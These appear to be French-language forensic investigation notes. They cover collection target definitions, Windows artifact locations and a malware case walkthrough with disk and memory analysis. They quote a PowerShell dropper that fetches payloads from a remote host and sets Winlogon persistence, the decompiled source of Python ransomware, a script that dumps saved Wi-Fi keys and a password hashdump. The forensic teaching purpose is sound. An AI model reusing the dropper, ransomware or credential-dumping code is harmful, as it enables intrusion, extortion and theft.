Path: C:\Users\*\AppData\Local\Microsoft\Windows\WebCache
IsDirectory: Yes
Recursive: false
Comment: ""
FireFox
Description: Firefox
Author: Eric Zimmerman
Version: 1.1
Id: 28801734-b95a-47e7-b84f-4ebd0c104862
RecreateDirectories: true
Targets:
-
Name: Places
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Downloads
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\downloads.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Form history
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\formhistory.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Cookies
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Signons
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\signons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Webappstore
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\webappstore.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Favicons
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\favicons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Addons
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\addons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Search
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\search.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Places
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\places.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Downloads
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\downloads.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Form history
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\formhistory.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Cookies
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\cookies.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Signons
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\signons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Webappstore
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\webappstore.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Favicons
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\favicons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Addons
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\addons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Search
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\search.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
Chome
Description: Chrome
Author: Eric Zimmerman
Version: 1.1
Id: a56d0a8f-3229-489e-aea7-353d1f6f9639
RecreateDirectories: true
Targets:
-
Name: Chrome bookmarks XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Bookmarks*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Cookies XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Cookies*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Current Session XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Current Session
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Current Tabs XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Current Tabs
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Favicons XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Favicons*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome History XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\History*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Last Session XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Last Session
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Last Tabs XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Last Tabs
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Preferences XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Preferences
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Shortcuts XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Shortcuts*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Top Sites XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Top Sites*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome bookmarks XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Bookmarks*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Visited Links XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Visited Links
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Web Data XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Web Data*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome bookmarks
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Bookmarks*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Cookies
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Cookies*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Current Session
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Current Session
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Current Tabs
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Current Tabs
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Favicons
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Favicons*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome History
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\History*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Last Session
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Last Session
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Last Tabs
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Last Tabs
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Preferences
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Preferences
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Shortcuts
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Shortcuts*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Top Sites
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Top Sites*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome bookmarks
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Bookmarks*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Visited Links
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Visited Links
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Web Data
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Web Data*
IsDirectory: false
Recursive: false
Comment:
InternetExplorer
Description: Internet Explorer
Author: Eric Zimmerman
Version: 1
Id: b1e1d79b-324d-4587-a002-cc81144588ff
RecreateDirectories: true
Targets:
-
Name: Index.dat History
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\History\History.IE5\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat History subdirectory
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\History\History.IE5\*\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat temp internet files
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Temporary Internet Files\Content.IE5\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat cookies
Category: Communications
Path: C:\Documents and Settings\*\Cookies\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat UserData
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Microsoft\Internet Explorer\UserData\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat Office XP
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Microsoft\Office\Recent\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat Office
Category: Communications
Path: C:\Users\*\AppData\Roaming\Microsoft\Office\Recent\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Local Internet Explorer folder
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Internet Explorer\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Roaming Internet Explorer folder
Category: Communications
Path: C:\Users\*\AppData\Roaming\Microsoft\Internet Explorer\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 9/10 History
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\History\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 9/10 Cache
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\Temporary Internet Files\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 9/10 Cookies
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\Cookies\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 9/10 Download History
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\IEDownloadHistory\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 11 Metadata
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\WebCache
IsDirectory: true
Recursive: false
Comment: ""
-
Name: IE 11 Cache
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\INetCache\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 11 Cookies
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\INetCookies\
IsDirectory: true
Recursive: true
Comment: ""
Description: Chrome Extension Files
Author: piesecurity
Version: 1
Id: e748b5e3-e279-4e4d-8083-74293e5b6cde
RecreateDirectories: true
Targets:
-
Name: Chrome Extension Files
Category: Communication
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Extensions
IsDirectory: true
Recursive: true
-
Name: Chrome Extension Files XP
Category: Communications
Path: c:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Extensions
IsDirectory: true
Recursive: true
wmic useraccount get name,sid
#Set-ExecutionPolicy Bypass
$wifi=@()
#visualisation des réseaux bloqués
$cmd0= netsh wlan show blockednetworks
#liste des SSID
$cmd1=netsh wlan show profiles
ForEach($row1 in $cmd1)
{
#recup ssid regex
if($row1 -match 'Profil Tous les utilisateurs[^:]+:.(.+)$')
{
$ssid=$Matches[1]
$cmd2=netsh wlan show profiles $ssid key=clear
Foreach($row2 in $cmd2)
{
#recup clef wifi
if($row2 -match 'Contenu de la c[^:]+:.(.+)$')
{
$key=$Matches[1]
#stockage des ssid et clef dans tab
$wifi+=[PSCustomObject]@{ssid=$ssid;key=$key}
}
}
}
}
#export dans csv
$wifi | export-CSV -Path 'C:\Users\Root\Desktop\wifi.csv' -NoTypeInformation
#visu tableau
$wifi| Sort -Property ssid|Out-GridView -Title 'Clés des SSID du poste'
netsh wlan show profiles netsh wlan show profiles SID key=clear
cls
$BasePath = "D:\case001"
Get-ChildItem -Path $BasePath -Recurse | % {
$StreamData = $null
$StreamData = Get-Item -Stream * -Path $_.FullName | ? {$_.Stream -match "Zone.Identifier"} | Get-Content -Stream "Zone.Identifier" | ? {$_ -match "(ZoneId=|ReferrerUrl=|HostUrl=)"}
if ($StreamData -match "ZoneId=3") {
Write-Host "`nFound : $($_.FullName)" -ForegroundColor Yellow
$StreamData | % {Write-Host $_}
}
}
$wc = New-Object System.Net.WebClient $h = $wc.DownloadString('https://twitter.com/S1mpleCC') $x = ($h.Replace("`t","").Replace("`n","").Replace(" ","").Split("<") | ? {$_ -match "class=`"TweetTextSize"} | Select-Object -First 1).Split(">")[1] (New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/6a992d5529f459a44fee58c733255e86.bat', 'C:\Users\esdacademy\AppData\Local\Google\Chrome\User Data\index.bat') (New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/76868ae832f6c6bd26cadc7d7c269986.lnk', 'C:\Users\esdacademy\Desktop\Google Chrome.lnk') (New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/eb6fb390f0c734d59e469525bd84ee18.exe', 'C:\Users\esdacademy\AppData\Local\Google\Chrome\User Data\Default\GoogleUpdaterService.exe') (New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/cecea6856f21bf30c693534f7f8484dd.exe', 'C:\Users\esdacademy\AppData\Local\Google\Chrome\User Data\Default\GoogleSecurityCheck.exe') (New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/e91e6348157868de9dd8b25c81aebfb9.xml', 'C:\Users\esdacademy\AppData\Local\Google\Chrome\User Data\security.xml') (New-Object System.Net.WebClient).DownloadFile('http://'+$x+'/drop/0ba4439ee9a46d9d9f14c60f88f45f87.ps1', 'C:\Users\esdacademy\AppData\Local\Google\Software Reporter Tool\reports\check.ps1') Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" 'explorer.exe, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -file "C:\Users\esdacademy\AppData\Local\Google\Software Reporter Tool\reports\check.ps1"' -Force
pour decompiler un exe python
python pyinstxtractor.py ntuser.exe cd ntuser.exe_extracted/
python INDXParse -d I30 > deleted.csv
Pour recuperer les fichiers dans la corbeille
comme SFX
VBoxManage.exe clonehd "D:\data stage\infected-disk001.vmdk" "D:\data stage\disque.dd" --format raw
vol.exe -f mem01.bin imageinfo set vol=vol.exe -f mem01.bin --profile=WinXPSP2x86 %vol% pslist %vol% pstree %vol% psscan %vol% psxview %vol% envars | findstr COMPUTERNAME %vol% hivelist %vol% printkey -o 0x8b21c008 -K "ControlSet001\Control\ComputerName\ComputerName" %vol% hashdump Volatility Foundation Volatility Framework 2.6 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: John Doe:1000:aad3b435b51404eeaad3b435b51404ee:b9f917853e3dbf6e6831ecce60725930:::
liste les disques montés
udisksctl status
On regarde l'offset de démarrage :
mmls /dev/sdb
Utilisation de fls pour naviguer dans la $MFT jusqu'au répertoire ou il y a le binaire compilé de python ntuser.exe
fls /dev/sdb -o 2048 fls /dev/sdb -o 2048 17997
Utilisation de icat pour récupéré les données du FILE0 de la $MFT du fichier ntuser.exe :
istat /dev/sdb -o 2048 16492
Utilisation de icat pour extraire le fichier :
icat /dev/sdb -o 2048 16492 >~/ntuser.exe
Valable que pour décompiler les programme python compilé en exe inférieur version 3.4
pip install uncompyle6
il faut modifier le nombre magique d'un fichier compiler avec python
pour être décompiler avec uncompyle6
Pour cela on regarde le nombre magique d'un fichier pyc puis on le rajoute au debut du ntuserls
xxd abc.pyc |less xxd ntuser |less
on voit dans un pyc : 00000000: 03f3 0d0a 0000 0000 6300 0000 0000 0000 ........c
alors que dans le ntuser à decompiler : 00000000: 6300 0000 0000 0000 0003 0000 0040 0000 c
printf "\x03\xf3\\x0d\x0a\x00\x00\x00\x00" | cat - ntuser > ntuser.pyc
on décompile
uncompyle6 ntuser.pyc # uncompyle6 version 3.6.0 # Python bytecode 2.7 (62211) # Decompiled from: Python 2.7.14+ (default, Mar 13 2018, 15:23:44) # [GCC 7.3.0] # Embedded file name: ntuser.py from cryptography.fernet import Fernet from requests import get from os import listdir, getcwd, remove from os.path import isdir import os, getpass from bs4 import BeautifulSoup mode = False def recurse(path): global fn global mode for i in listdir(path): if isdir(path + '\\' + i): recurse(path + '\\' + i) else: if mode == False and i.split('.')[(-1)] == 'cry': fn = Fernet(str(raw_input('Password ? ')).encode('utf8')) mode = True if not mode and i.split('.')[(-1)] != 'cry': encrypt(path + '\\' + i) else: decrypt(path + '\\' + i) def encrypt(path): f = open(path, 'rb') f2 = open(path + '.cry', 'w+') f2.write(fn.encrypt(f.read())) f.close() f2.close() remove(path) def set_vbs(vb): path = 'C:\\users\\' + getpass.getuser() + '\\appdata\\local\\config' if isdir(path): f = open(path + '\\aaa.vbs', 'w+') f.write(vb.decode('base64')) f.close() else: os.mkdir(path) set_vbs(vb) def get_host(): r = get('https://twitter.com/S1mpleCC') soup = BeautifulSoup(r.text, 'lxml') tag = soup.find('p', 'tweet-text') return tag.text host = get_host() r = get('http://' + host + '/3f792f24bdd299f1c163f2358fb130f9.php').text.encode('utf8') set_vbs(r.split('x07C82')[0]) fn = Fernet(r.split('x07C82')[1]) recurse('C:\\users\\' + getpass.getuser() + '\\desktop') # okay decompiling ntuser.pyc
icat /dev/sdb -o 2048 16492 >~/ntuser.exe
istat /dev/sdb -o 2048 16492
fls /dev/sdb -o 2048 fls /dev/sdb -o 2048 17997
udisksctl status
mount -o loop, ro
System.evtx
● Le driver Plug and Play tente une installation
● Date et heure de l’installation du driver
● Informations relatives au périphérique
● Numéro de série du périphérique
● Statut PnP (0 = pas d’erreur)
Lorsqu’un driver PnP tente de s’installer sur le système, un événement
(ID 20001) est créé et fourni un statut relatif à cet événement. Il est
important de noter que cet événement n’est pas uniquement lié à
l’USB, mais aussi le firewire, et autres connectiques.
● Identification du VID et du PID
● Date et l’heure du branchement
Les périphérique n’ayant pas un numéro de série unique ont un “&” en
second caractère de numéro de série. Les autres numéros de série sont
uniques, ce qui veut dire que le constructeur respecte les normes
internationales.
● SYSTEM\CurrentControlSet\Enum\USBSTOR
● SYSTEM\CurrentControlSet\Enum\USB
Découvrir une lettre associée à un Drive (pluggé à la machine hôte)
Cette technique fonctionne uniquement sur le dernier périphérique
associé sur une lettre. Il n’y a pas d’historique ni de liste de clés
associées à une lettre.
● SYSTEM\CurrentControlSet\Enum\USBSTOR
● SYSTEM\MountedDevices
● SOFTWARE\Microsoft\Windows Portable Devices\Devices
Les fichiers .lnk (raccourcis) contiennent le numéro de série du volume
ainsi que son nom. La clé de registre RecentDocs contient le nom du
●
Identification du VID et du PID
●
Date et l’heure du branchement
http://the-sz.com/products/usbid/
Identification de la clé
4. Les artefacts
Artefacts USB
volume lorsque la clé est explorée depuis Explorer. Il ne s’agit pas du numéro
de série de la clé qui est elle codée en dur dans le firmware.
● SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ENDMgmt
● Un fichier est séparé en deux fichiers distincts
● Date et heure de suppression
● Nom original du fichier supprimé
● Chemin du fichier supprimé
● Fichier de sauvegarde
La corbeille contient tout d’abord un répertoire racine contenant des
sous-répertoires au noms des SID présents sur la machine.
Chaque SID peut être mis en relation avec un utilisateur via le registre
ou la commande
Get-WmiObject win32_useraccount | Select name,
sid
Les fichiers commençant par $I files contiennent le chemin d’origine du
fichier et la date et heure de suppression
Les fichiers commençant par $R sont les fichiers de sauvegarde des
fichiers supprimés
● C:\$Recycle.bin
● Miniatures des documents présents dans un répertoires
● Chemin du répertoire
● Même si le répertoire est supprimé
● Même si le fichier est supprimé
● Même si le périphérique est déconnecté
Les miniatures d’images, de document et répertoires persistent dans
une base de données appelée thumbcache.db. Chaque utilisateur a sa
propre base. Les miniatures enregistrées sont récupérables en
plusieurs formats : small, medium, large, extra-large. Elles sont
enregistrée dans l’une de ces catégories en fonction du type
d’affichage de l’utilisateur.
● C:\%USERPROFILE%\AppData\Local\Microsoft\Windows\Expl
orer
●Miniature d’une image
● Miniature du fichier (même si supprimé)
● Dernière modification (XP)
● Nom de fichier d’origine (XP)
Il s’agit d’un fichier caché dans un répertoire. Les miniatures des
images et icônes de fichiers sont enregistré dans le fichier thumbs.db.
Ce fichier est créé automatiquement lorsque le partage réseaux
homegroup est activé ou lorsqu’un répertoire est accédé via un chemin
UNC.
●Mots-clés recherché par l’utilisateur dans le champ recherché
●Mots-clés recherché par l’utilisateur dans le menu démarrer
●Date et heure de la recherche
Il s’agit des mots clés saisis par l’utilisateur dans la bar de recherche ou
le menu démarrer depuis Windows 7. Les mots clés sont au format
unicode et listé de manière chronologique dans la sous-clé MRUList.
C:\Users\*\NTUSER.DAT
●NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex
plorer\WordWheelQuery
Dans chaque répertoire avec au moins un fichier, il a un fichier $I30
mmls /dev/sdb
●Possibilité de retrouver les 150 derniers fichiers récents.
●La date de modification du registre correspond à la date d’ouverture/d’accès et permet d’
établir une chronologie.
●La sous-clé folder permet de retrouver les répertoires ouverts par l’utilisateur.
Cette clé de registre va suivre les derniers fichiers et répertoires
ouverts. Ces fichiers sont accessibles depuis “mes fichiers récents”
dans la barre de navigation latérale.
C:\Users\*\NTUSER.DAT
●NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex
plorer\RecentDocs
●Accès à des répertoires (Locaux ou sur le réseau)
●Accès à des périphériques
●Date et heure d’accès
●Même si le périphérique est débranché ou le répertoire supprimé
Les shell bags permettent de déterminer les accès à des répertoires
sur
la machine locale, le réseau ou des périphériques externes. Il est
possible de retrouver des répertoires supprimés ou modifiés et la
dernière date à laquelle l’utilisateur y a eu accès.
C:\Users\*\AppData\Local\Microsoft\Windows\USRCLASS.DAT
C:\Users\*\NTUSER.DAT
Explorer :
●USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags
●USRCLASS.DAT\LocalSettings\Software\Microsoft\Windows\Shell\BagMRU
Desktop :
●NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU
●NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags
● Date et heure d’ouverture
● Chemin du fichier
● index.dat > file:///C:/chemin/nomdufichier.ext
Un des comportements méconnus de l’historique IE est qu’il
n’enregistre pas que les sites internet consultés mais bel et bien des
accès à des fichiers du disque (ou partages réseau). Il va de soi que cet
historique apporte énormément d’information en terme de
temporalité.
● %USERPROFILE%\Local Settings\History\ History.IE5
● %USERPROFILE%\AppData\Local\Microsoft\Windows\History\
History.IE5
● %USERPROFILE%\AppData\Local\Microsoft\Windows\WebCac
he\WebCacheV*.dat%
● Traque les programmes utilisés pour ouvrir des fichiers via OpenSaveMRU
● Extension des fichiers ouverts
● Noms de fichiers ouverts
● Application utilisée pour ouvrir un fichier
● Chemin de l’application
● Chronologie possible
Traque les exécutables utilisés par une application pour ouvrir un document (présent dans OpenSaveMRU). De plus, chaque valeur associe le répertoire ou le fichier a été ouvert par cette application.
● NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\ComDlg32\ LastVisitedMRU
● NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\ComDlg32\ LastVisitedPidlMRU
affichage dir /r
more < normal.txt:$DATA
c:\$MFT
attrib -s -h $MFT
● Applications démarrées
● Date d’exécution
● Focus par application
Windows 10 enregistre toutes les applications qui ont été utilisées récemment et propose à l’utilisateur une timeline accessible avec les touches suivantes > WIN+TAB.
Ces données sont enregistrées au format SQLite.
C:\Users\<username>\AppData\Local\ConnectedDevicesPlatfor m\<random>\ActivitiesCache.db
Amcache.hve
● Une entrée pour chaque exécutable
● Chemin d’exécution et volume associé
● $StandardInfo
● Démarré pour la première fois : Last Modification
● SHA1 de l’exécutable
ProgramDataUpdater (une tâche associée au service ‘Application Experience’) utilise la ruche Amcache.hve pour stocker de la donnée lors de la création de process.
● C:\Windows\AppCompat\Programs\Amcache.hve
NTUSER.DAT
C:\Windows\Prefetch
fichier caché
NTUSER.DAT
Tous les programmes basés sur un GUI, exécutés sont historisés dans :
● NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Ex plorer\UserAssist\GUID}\Count
Les données récupérées incluent la précieuse information : L’utilisateur a exécuté le programme depuis un raccourci ou depuis le fichier original. Cela apporte à l’investigation des précisions sur le contexte de lancement d’un programme.
Les valeurs encodées en ROT-13.
● AppID : Nom de l’application
● LastAccessTime : Dernière exécution (UTC+0)
● LaunchCount : Nombre de fois que le programme a été lancé
L’exécution de programmes sur Windows 10 sont enregistrées en base de registre.
● NTUSER.DAT\Software\Microsoft\Windows\Current Version\Search\RecentApps
Chaque clé GUID pointe sur une application récente.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore
vssadmin /list shadows (“/delete all” => anti-forensic)
vss_carver (github) : Format de disque .raw
forensic explorer (payant)
● Nom de fichier exécutable
● Chemin d’exécution
● Taille de fichier
● Timestamp dernière modification
● LastUpdateTime est mis à jour quand un programme est exécuté
Windows Application Compatibility Database est utilisée par Windows pour vérifier si une application doit démarrer en mode de compatibilité. Chaque exécutable qui a été démarré doit se trouver dans cette clé. Le but est de déterminer quel programme a été lancé et quand.
Windows XP contient 96 entrées max. Windows 7+ contient 1024 entrées max. LastUpdateTime n’existe plus à partir de Windows 7+.
C:\Windows\System32\config
● SYSTEM\CurrentControlSet\Control\SessionManager\AppCom patibility
● SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
● Performances
● Applications démarrées (Comptes associés)
● Trafic réseau (Nombre de bytes envoyés et reçus par l’application)
Fait son apparition à partir de Windows 8.1 Enregistre 30 à 60 d’historique d’activité de la machine.
● SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SRUM\Exte nsions{d10ca2fe-6fcf4f6d-848e-b2e99266fa89}
● C:\Windows\System32\SRU\
● URLZONE_TRUSTED (ZoneID 2 )
● URLZONE_INTERNET (ZoneID 3)
● URLZONE_UNTRUSTED (ZoneID 4)
Depuis Windows XP SP2 lorsque des fichiers sont téléchargés depuis le web via un navigateur pour être stockés sur un système NTFS, un flux ADS est associé aux fichiers : Alternate Data Stream ‘Zone.Identifier’
1 : Local
2 : Trusted
3: Internet
4 : Unrusted
Les fichiers avec un flux ADS Zone.Identifier ZoneID=3 proviennent d’internet
● Nom du fichier
● Taille
● Type
● Téléchargé depuis
● Referrer
● Chemin de sauvegarde
● Application utilisée pour ouvrir le fichier
● Date de début et date de fin de téléchargement
Firefox et IE ont comme fonctionnalité native un download manager. Celui-ci conserve un historique de tout ce qui a été téléchargé par l’utilisateur.
● %USERPROFILE%\Application Data\Mozilla\ Firefox\Profiles\.default\downloads.sqlite
● %USERPROFILE%\AppData\Roaming\Mozilla\ Firefox\Profiles\.default\downloads.sqlite
● %USERPROFILE%\AppData\Roaming\Microsoft\Windows\IED ownloadHistory\
● %USERPROFILE%\AppData\Local\Microsoft\Windows\WebCac he\WebCacheV*.dat
● Fichiers ouverts via un navigateur
● Date et heure de consultation
● N’implique pas forcément un téléchargement
A dissocier du répertoire téléchargement.
Les navigateurs logent aussi dans l’historique les fichiers qui ont été téléchargés depuis un site web et ouverts via le navigateur directement.
ex : Téléchargement d’un .pdf et ouverture de ce PDF avec Chrome
● %USERPROFILE%\AppData\Roaming\Microsoft\Windows\IED ownloadHistory\index.dat
● %USERPROFILE%\AppData\Local\Microsoft\Windows\WebCac he\WebCacheV*.dat
● %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\. default\downloads.sqlite
● %USERPROFILE%\AppData\Roaming\Mozilla\ Firefox\Profiles\.default\places.sqlite
● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History
● Date et heure des communications
● Profil skype associé à chaque action
● Fichiers envoyés
L’historique Skype garde des logs des sessions de communications et des fichiers transférés d’une machine à l’autre. Par défaut, les logs sont activés.
● C:\Documents and Settings\\Application\Skype\
● C:\%USERPROFILE%\AppData\Roaming\Skype\
80% des données données fournies par les e-mails sont en pièce jointe. Les e-mails standards ne contiennent que du texte alors que ses pièces jointes sont encodées au format MIME/base64.
● .ost / .pst : Format Microsoft Outlook
● .mbox : Format Unix
● %USERPROFILE%\Local Settings\ApplicationData\Microsoft\Outlook
● %USERPROFILE%\AppData\Local\Microsoft\Outlook
● Traque les fichiers ouverts ou enregistrés récemment (toutes extensions confondues)
● Stocke des informations relatives aux fichiers ayant déclenché la boîte de dialogue “Ouvrir” ou “Enregistrer”
Pour faire simple, chaque fichier ayant été ouvert ou enregistré (par l’intermédiaire d’une boîte de dialogue Windows) est historisé en base de registre. Les fichiers enregistrée par le biais d’un navigateur web actionnent cette boîte de dialogue.
● NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\ComDlg32\OpenSaveMRU
● NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\ComDlg32\OpenSavePIDlMRU
● Énumération des domaines consultés
● Timestamp des cookies
